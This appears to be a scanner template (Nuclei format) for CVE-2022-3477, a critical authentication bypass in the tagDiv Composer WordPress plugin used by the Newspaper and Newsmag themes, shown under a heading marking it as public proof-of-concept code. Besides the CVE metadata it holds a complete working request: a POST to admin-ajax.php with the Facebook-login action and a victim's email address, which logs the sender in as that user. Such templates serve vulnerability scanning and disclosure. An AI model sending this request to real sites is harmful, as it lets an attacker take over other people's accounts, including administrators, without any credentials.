The tagDiv Composer WordPress plugin before 3.5, required by the Newspaper WordPress theme before 12.1 and Newsmag WordPress theme before 5.2.2, does not properly implement the Facebook login feature, allowing unauthenticated attackers to login as any user by just knowing their email address
PoC代码[已公开]
id: CVE-2022-3477
info:
name: WordPress tagDiv Composer < 3.5 - Authentication Bypass
author: melmathari
severity: critical
description: |
The tagDiv Composer WordPress plugin before 3.5, required by the Newspaper WordPress theme before 12.1 and Newsmag WordPress theme before 5.2.2, does not properly implement the Facebook login feature, allowing unauthenticated attackers to login as any user by just knowing their email address
remediation: Fixed in 3.5
reference:
- https://wpscan.com/vulnerability/993a95d2-6fce-48de-ae17-06ce2db829ef
- https://nvd.nist.gov/vuln/detail/CVE-2022-3477
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-3477
cwe-id: CWE-287
epss-score: 0.58344
epss-percentile: 0.98088
cpe: cpe:2.3:a:newsmag_project:newsmag:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: newsmag_project
product: newsmag
framework: wordpress
tags: cve,cve2022,wordpress,wp-plugin,wpscan,wp,auth-bypass,tagdiv,vkev,vuln
variables:
email: "{{email}}" # victim's email address required.
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=td_ajax_fb_login_user&user[email]={{email}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"success":"You have been successfully logged in!'
- type: word
part: content_type
words:
- 'text/html'
- type: status
status:
- 200
# digest: 4a0a00473045022062d52b551be3fe5529152bfadf95b550adb5ab5b12973ac42bc3ac007118ae3c022100c643899a4437a6e5b1895f66ddb8ebbe3537fe8dfad2dd0adb0e2eeb70efcead:922c64590222798bb761d5b6d8e72950